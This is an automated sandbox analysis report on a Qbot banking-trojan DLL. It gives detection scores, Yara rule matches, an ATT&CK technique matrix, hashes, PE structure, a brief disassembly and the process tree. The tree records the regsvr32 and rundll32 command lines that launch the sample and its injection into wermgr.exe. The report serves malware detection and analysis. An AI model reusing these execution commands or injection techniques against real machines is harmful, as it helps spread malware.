          Source: Yara matchFile source: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.319688371.0000000001000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000003.312800639.0000000000400000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.319841073.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.319924513.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.322491943.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.322126638.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected Qbot
          Source: Yara matchFile source: 8.0.wermgr.exe.e00000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.rundll32.exe.4820000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.3.rundll32.exe.b90000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.wermgr.exe.e00000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.3.rundll32.exe.2fa0000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.3.rundll32.exe.2fa0000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.3.rundll32.exe.b90000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.3.regsvr32.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.wermgr.exe.e00000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.regsvr32.exe.730000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.wermgr.exe.e00000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.rundll32.exe.2cc0000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.wermgr.exe.e00000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.regsvr32.exe.730000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.3.regsvr32.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.rundll32.exe.2cc0000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.wermgr.exe.1000000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.wermgr.exe.e00000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.wermgr.exe.e00000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.wermgr.exe.e00000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.rundll32.exe.4820000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.wermgr.exe.1000000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000003.312922602.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000003.313259350.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.320649129.0000000004820000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.320603133.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.319688371.0000000001000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000003.312800639.0000000000400000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.319841073.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.319924513.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.322491943.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.322126638.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts3
          Native API          		1
          DLL Side-Loading          		311
          Process Injection          		1
          Masquerading          		1
          Credential API Hooking          		1
          System Time Discovery          		Remote Services1
          Screen Capture          		Exfiltration Over Other Network Medium2
          Encrypted Channel          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
          DLL Side-Loading          		2
          Virtualization/Sandbox Evasion          		LSASS Memory14
          Security Software Discovery          		Remote Desktop Protocol1
          Credential API Hooking          		Exfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)311
          Process Injection          		Security Account Manager2
          Virtualization/Sandbox Evasion          		SMB/Windows Admin Shares1
          Archive Collected Data          		Automated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
          Deobfuscate/Decode Files or Information          		NTDS2
          Process Discovery          		Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script2
          Obfuscated Files or Information          		LSA Secrets1
          File and Directory Discovery          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common1
          Regsvr32          		Cached Domain Credentials35
          System Information Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items1
          Rundll32          		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
          DLL Side-Loading          		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 719511 Sample: diatomaceous.dat.dll Startdate: 10/10/2022 Architecture: WINDOWS Score: 96 31 Malicious sample detected (through community Yara rule) 2->31 33 Multi AV Scanner detection for submitted file 2->33 35 Yara detected Qbot 2->35 37 3 other signatures 2->37 8 loaddll32.exe 1 2->8         started        process3 process4 10 regsvr32.exe 8->10         started        13 cmd.exe 1 8->13         started        15 rundll32.exe 8->15         started        17 2 other processes 8->17 signatures5 47 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 10->47 49 Writes to foreign memory regions 10->49 51 Allocates memory in foreign processes 10->51 19 wermgr.exe 8 1 10->19         started        22 rundll32.exe 13->22         started        53 Maps a DLL or memory area into another process 15->53 25 wermgr.exe 15->25         started        process6 file7 29 C:\Users\user\Desktop\diatomaceous.dat.dll, PE32 19->29 dropped 39 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 22->39 41 Writes to foreign memory regions 22->41 43 Allocates memory in foreign processes 22->43 45 Maps a DLL or memory area into another process 22->45 27 wermgr.exe 22->27         started        signatures8 process9

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          diatomaceous.dat.dll73%ReversingLabsWin32.Backdoor.Quakbot
          diatomaceous.dat.dll77%VirustotalBrowse
          diatomaceous.dat.dll44%MetadefenderBrowse
          diatomaceous.dat.dll100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\Desktop\diatomaceous.dat.dll3%VirustotalBrowse
          C:\Users\user\Desktop\diatomaceous.dat.dll4%ReversingLabs
          C:\Users\user\Desktop\diatomaceous.dat.dllNaN%MetadefenderBrowse

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          8.2.wermgr.exe.e00000.0.unpack100%AviraHEUR/AGEN.1234562Download File
          9.0.wermgr.exe.e00000.0.unpack100%AviraHEUR/AGEN.1234562Download File
          5.2.rundll32.exe.2cc0000.1.unpack100%AviraHEUR/AGEN.1234562Download File
          9.2.wermgr.exe.e00000.0.unpack100%AviraHEUR/AGEN.1234562Download File
          8.0.wermgr.exe.e00000.0.unpack100%AviraHEUR/AGEN.1234562Download File
          3.2.regsvr32.exe.730000.1.unpack100%AviraHEUR/AGEN.1234562Download File
          7.0.wermgr.exe.1000000.0.unpack100%AviraHEUR/AGEN.1234562Download File
          4.2.rundll32.exe.4820000.1.unpack100%AviraHEUR/AGEN.1234562Download File

          Domains

          No Antivirus matches

          URLs

          No Antivirus matches

          Domains and IPs

          Contacted Domains

          No contacted domains info

          World Map of Contacted IPs

          No contacted IP infos

          General Information

          Joe Sandbox Version:36.0.0 Rainbow Opal
          Analysis ID:719511
          Start date and time:2022-10-10 17:03:44 +02:00
          Joe Sandbox Product:CloudBasic
          Overall analysis duration:0h 9m 22s
          Hypervisor based Inspection enabled:false
          Report type:full
          Sample file name:diatomaceous.dat.dll
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
          Run name:Run with higher sleep bypass
          Number of analysed new started processes analysed:15
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • HDC enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Detection:MAL
          Classification:mal96.troj.evad.winDLL@18/1@0/0
          EGA Information:
          • Successful, ratio: 100%
          HDC Information:
          • Successful, ratio: 73.2% (good quality ratio 68.1%)
          • Quality average: 75.3%
          • Quality standard deviation: 29.8%
          HCA Information:
          • Successful, ratio: 99%
          • Number of executed functions: 27
          • Number of non-executed functions: 68
          Cookbook Comments:
          • Found application associated with file extension: .dll
          • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

          Warnings

          • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe
          • Not all processes where analyzed, report is missing behavior information
          • Report creation exceeded maximum time and may have missing disassembly code information.

          Simulations

          Behavior and APIs

          No simulations

          Joe Sandbox View / Context

          IPs

          No context

          Domains

          No context

          ASNs

          No context

          JA3 Fingerprints

          No context

          Dropped Files

          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
          C:\Users\user\Desktop\diatomaceous.dat.dlldiatomaceous.dat.dllGet hashmaliciousBrowse

            Created / dropped Files

            C:\Users\user\Desktop\diatomaceous.dat.dll

            Download File
            Process:C:\Windows\SysWOW64\wermgr.exe
            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
            Category:dropped
            Size (bytes):4096
            Entropy (8bit):4.5939701639198445
            Encrypted:false
            SSDEEP:48:LtIesYew8vL36I8LgS72DsOA1dyqQrD1tXPFJhsppwAOY5iRYgZX0dB1mkK52wRa:aesqt2Dk1dyqIF9JhsLwAOhf2ZW2wIPD
            MD5:C79A1334A3C60DACEE5E43B715236A17
            SHA1:825F4CA853E99E10B81ABE84A1EB2CB6CFD3E8E7
            SHA-256:F892742F6C64A8991337FADDF84FBDB25C43022AC85C8BCC30D47FEBAFEA1D87
            SHA-512:D0B15BAAD608A3EF3AC13E881B9CCA7C27A56CC735AA7324C7AA677274C9FE73FA9B438FDC1B7B2C2B8717EC8949B0ECA605DF58A504F0A705576DC0BA7AF61D
            Malicious:true
            Antivirus:
            • Antivirus: Virustotal, Detection: 3%, Browse
            • Antivirus: ReversingLabs, Detection: 4%
            • Antivirus: Metadefender, Detection: NaN%, Browse
            Joe Sandbox View:
            • Filename: diatomaceous.dat.dll, Detection: malicious, Browse
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........B.[.,.[.,.[.,../.V.,..)..,..(.M.,...(.T.,.../.H.,...)...,..-.^.,.[.-.=.,..%.\.,..,.Z.,....Z.,.[...Z.,....Z.,.Rich[.,.................PE..L...n07c...........!....."..........n........@...............................@............@.............................l...l...<....`....................... ......................................p...@............@..\............................text...\!.......".................. ..`.rdata..<....@.......&..............@..@.data....,...0... ..................@....rsrc........`.......(..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

            Static File Info

            General

            File type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
            Entropy (8bit):6.8621600107462
            TrID:
            • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
            • Generic Win/DOS Executable (2004/3) 0.20%
            • DOS Executable Generic (2002/1) 0.20%
            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
            File name:diatomaceous.dat.dll
            File size:393216
            MD5:2e7f90e0c595d88d28f9fd979ccfcf33
            SHA1:8ff540ba601429c2ee0a444b0d2ec2650d178d23
            SHA256:e3a2c056c730666fedabfed5e3cc2dee12d9c3ca36ac2d7c5289cfe29c125050
            SHA512:0ab199c211e7fe09b332c21da969d26ecccbd2947853c9a7793083e51c59b3aa6a765a0e1d2511c61672c49a60057a5bb05bf29eea33c074b95af55cb9e9a03f
            SSDEEP:6144:8WlZhgoMdtBYTNSlWBsAOrbd62IYQ8jjHH62uzdMPF699o9:Vl3goMdrb5J6wQ8faVn99o
            TLSH:AA846A0379D9BCB6C579123027379BE0C72DEC250BA0C9EF67D8196A4A3C2837525BE5
            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........B.[.,.[.,.[.,.../.V.,...)...,...(.M.,...(.T.,.../.H.,...)...,...-.^.,.[.-.=.,...%.\.,...,.Z.,.....Z.,.[...Z.,.....Z.,.Rich[.,

            File Icon

            Icon Hash:64da98ecd2ceead4

            Static PE Info

            General

            Entrypoint:0x10009b6e
            Entrypoint Section:.text
            Digitally signed:false
            Imagebase:0x10000000
            Subsystem:windows cui
            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
            Time Stamp:0x6337306E [Fri Sep 30 18:07:42 2022 UTC]
            TLS Callbacks:
            CLR (.Net) Version:
            OS Version Major:6
            OS Version Minor:0
            File Version Major:6
            File Version Minor:0
            Subsystem Version Major:6
            Subsystem Version Minor:0
            Import Hash:5258e65ea568c264cf3e536d81339bf5

            Entrypoint Preview

            Instruction
            push ebp
            mov ebp, esp
            cmp dword ptr [ebp+0Ch], 01h
            jne 00007F6C94BF9CF7h
            call 00007F6C94BFA1B2h
            push dword ptr [ebp+10h]
            push dword ptr [ebp+0Ch]
            push dword ptr [ebp+08h]
            call 00007F6C94BF9BA3h
            add esp, 0Ch
            pop ebp
            retn 000Ch
            cmp ecx, dword ptr [10033014h]
            jne 00007F6C94BF9CF3h
            ret
            jmp 00007F6C94BFA29Bh
            mov ecx, dword ptr [ebp-0Ch]
            mov dword ptr fs:[00000000h], ecx
            pop ecx
            pop edi
            pop edi
            pop esi
            pop ebx
            mov esp, ebp
            pop ebp
            push ecx
            ret
            push eax
            push dword ptr fs:[00000000h]
            lea eax, dword ptr [esp+0Ch]
            sub esp, dword ptr [esp+0Ch]
            push ebx
            push esi
            push edi
            mov dword ptr [eax], ebp
            mov ebp, eax
            mov eax, dword ptr [10033014h]
            xor eax, ebp
            push eax
            push dword ptr [ebp-04h]
            mov dword ptr [ebp-04h], FFFFFFFFh
            lea eax, dword ptr [ebp-0Ch]
            mov dword ptr fs:[00000000h], eax
            ret
            push eax
            push dword ptr fs:[00000000h]
            lea eax, dword ptr [esp+0Ch]
            sub esp, dword ptr [esp+0Ch]
            push ebx
            push esi
            push edi
            mov dword ptr [eax], ebp
            mov ebp, eax
            mov eax, dword ptr [10033014h]
            xor eax, ebp
            push eax
            mov dword ptr [ebp-10h], esp
            push dword ptr [ebp-04h]
            mov dword ptr [ebp-04h], FFFFFFFFh
            lea eax, dword ptr [ebp-0Ch]
            mov dword ptr fs:[00000000h], eax
            ret
            int3
            int3
            int3
            int3
            push ecx
            lea ecx, dword ptr [esp+08h]
            sub ecx, eax
            and ecx, 0Fh
            add eax, ecx
            sbb ecx, ecx
            or eax, ecx
            pop ecx
            jmp 00007F6C94BFA3DFh

            Data Directories

            NameVirtual AddressVirtual Size Is in Section
            IMAGE_DIRECTORY_ENTRY_EXPORT0x318000x6c.rdata
            IMAGE_DIRECTORY_ENTRY_IMPORT0x3186c0x3c.rdata
            IMAGE_DIRECTORY_ENTRY_RESOURCE0x560000xb890.rsrc
            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
            IMAGE_DIRECTORY_ENTRY_BASERELOC0x620000x1da8.reloc
            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2fb700x40.rdata
            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IAT0x240000x15c.rdata
            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

            Sections

            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
            .text0x10000x2215c0x22200False0.555016597985348data6.649026882960341IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            .rdata0x240000xe03c0xe200False0.5316993915929203data5.664939250342234IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .data0x330000x22ccc0x22000False0.8333668428308824DOS executable (block device driver \377\377\377\377\261)6.797248626276144IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            .rsrc0x560000xb8900xba00False0.17794438844086022data3.888171262767214IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .reloc0x620000x1da80x1e00False0.746484375data6.525986142096821IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

            Resources

            NameRVASizeTypeLanguageCountry
            RT_ICON0x565880xb13PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedRussianRussia
            RT_ICON0x570a00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsRussianRussia
            RT_ICON0x57f480x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsRussianRussia
            RT_ICON0x587f00x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsRussianRussia
            RT_ICON0x58d580xc4aPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedRussianRussia
            RT_ICON0x599a80x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896RussianRussia
            RT_ICON0x5dbd00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600RussianRussia
            RT_ICON0x601780x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224RussianRussia
            RT_ICON0x612200x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088RussianRussia
            RT_GROUP_ICON0x616880x84dataRussianRussia
            RT_VERSION0x562b00x2d4dataRussianRussia
            RT_MANIFEST0x617100x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States

            Imports

            DLLImport
            KERNEL32.dllSleep, VirtualAlloc, GetCommandLineA, CreateFileW, GetFileSize, CloseHandle, CreateFileA, LocalAlloc, GetModuleFileNameA, DebugBreak, ReadFile, WideCharToMultiByte, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, EncodePointer, DecodePointer, MultiByteToWideChar, LCMapStringEx, GetStringTypeW, GetCPInfo, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, GetModuleHandleW, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, GetCurrentProcess, TerminateProcess, RtlUnwind, RaiseException, InterlockedFlushSList, GetLastError, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, ExitProcess, GetModuleHandleExW, GetModuleFileNameW, HeapAlloc, HeapFree, GetStdHandle, GetFileType, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetProcessHeap, SetFilePointerEx, SetStdHandle, HeapSize, FlushFileBuffers, WriteFile, GetConsoleOutputCP, GetConsoleMode, WriteConsoleW
            ADVAPI32.dllCryptCreateHash, CryptHashData, CryptDestroyHash, CryptGetHashParam, CryptReleaseContext, CryptAcquireContextA

            Exports

            NameOrdinalAddress
            DllRegisterServer10x10006510
            DllUnregisterServer20x10007d50

            Possible Origin

            Language of compilation systemCountry where language is spokenMap
            RussianRussia
            EnglishUnited States

            Network Behavior

            No network behavior found

            Statistics

            CPU Usage

            Click to jump to process

            Memory Usage

            Click to jump to process

            High Level Behavior Distribution

            Click to dive into process behavior distribution

            Behavior

            Click to jump to process

            System Behavior

            General

            Target ID:0
            Start time:17:04:39
            Start date:10/10/2022
            Path:C:\Windows\System32\loaddll32.exe
            Wow64 process (32bit):true
            Commandline:loaddll32.exe "C:\Users\user\Desktop\diatomaceous.dat.dll"
            Imagebase:0xcc0000
            File size:116736 bytes
            MD5 hash:1F562FBF37040EC6C43C8D5EF619EA39
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:moderate

            General

            Target ID:1
            Start time:17:04:39
            Start date:10/10/2022
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff7c72c0000
            File size:625664 bytes
            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            General

            Target ID:2
            Start time:17:04:39
            Start date:10/10/2022
            Path:C:\Windows\SysWOW64\cmd.exe
            Wow64 process (32bit):true
            Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\diatomaceous.dat.dll",#1
            Imagebase:0xd90000
            File size:232960 bytes
            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            General

            Target ID:3
            Start time:17:04:39
            Start date:10/10/2022
            Path:C:\Windows\SysWOW64\regsvr32.exe
            Wow64 process (32bit):true
            Commandline:regsvr32.exe /s C:\Users\user\Desktop\diatomaceous.dat.dll
            Imagebase:0xe20000
            File size:20992 bytes
            MD5 hash:426E7499F6A7346F0410DEAD0805586B
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Author: unknown
            • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Author: unknown
            • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000003.00000003.312800639.0000000000400000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000003.00000003.312800639.0000000000400000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
            • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000003.00000003.312800639.0000000000400000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
            Reputation:high

            General

            Target ID:4
            Start time:17:04:39
            Start date:10/10/2022
            Path:C:\Windows\SysWOW64\rundll32.exe
            Wow64 process (32bit):true
            Commandline:rundll32.exe "C:\Users\user\Desktop\diatomaceous.dat.dll",#1
            Imagebase:0xc50000
            File size:61952 bytes
            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000004.00000003.312922602.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000004.00000003.312922602.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
            • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000004.00000003.312922602.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
            • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000004.00000002.320649129.0000000004820000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000004.00000002.320649129.0000000004820000.00000040.00000800.00020000.00000000.sdmp, Author: unknown
            • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000004.00000002.320649129.0000000004820000.00000040.00000800.00020000.00000000.sdmp, Author: unknown
            Reputation:high

            General

            Target ID:5
            Start time:17:04:39
            Start date:10/10/2022
            Path:C:\Windows\SysWOW64\rundll32.exe
            Wow64 process (32bit):true
            Commandline:rundll32.exe C:\Users\user\Desktop\diatomaceous.dat.dll,DllRegisterServer
            Imagebase:0xc50000
            File size:61952 bytes
            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000005.00000003.313259350.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000005.00000003.313259350.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
            • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000005.00000003.313259350.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
            • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000005.00000002.320603133.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000005.00000002.320603133.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Author: unknown
            • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000005.00000002.320603133.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Author: unknown
            Reputation:high

            General

            Target ID:6
            Start time:17:04:42
            Start date:10/10/2022
            Path:C:\Windows\SysWOW64\rundll32.exe
            Wow64 process (32bit):true
            Commandline:rundll32.exe C:\Users\user\Desktop\diatomaceous.dat.dll,DllUnregisterServer
            Imagebase:0xc50000
            File size:61952 bytes
            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            General

            Target ID:7
            Start time:17:04:44
            Start date:10/10/2022
            Path:C:\Windows\SysWOW64\wermgr.exe
            Wow64 process (32bit):true
            Commandline:C:\Windows\SysWOW64\wermgr.exe
            Imagebase:0x1160000
            File size:191904 bytes
            MD5 hash:CCF15E662ED5CE77B5FF1A7AAE305233
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000007.00000000.319688371.0000000001000000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
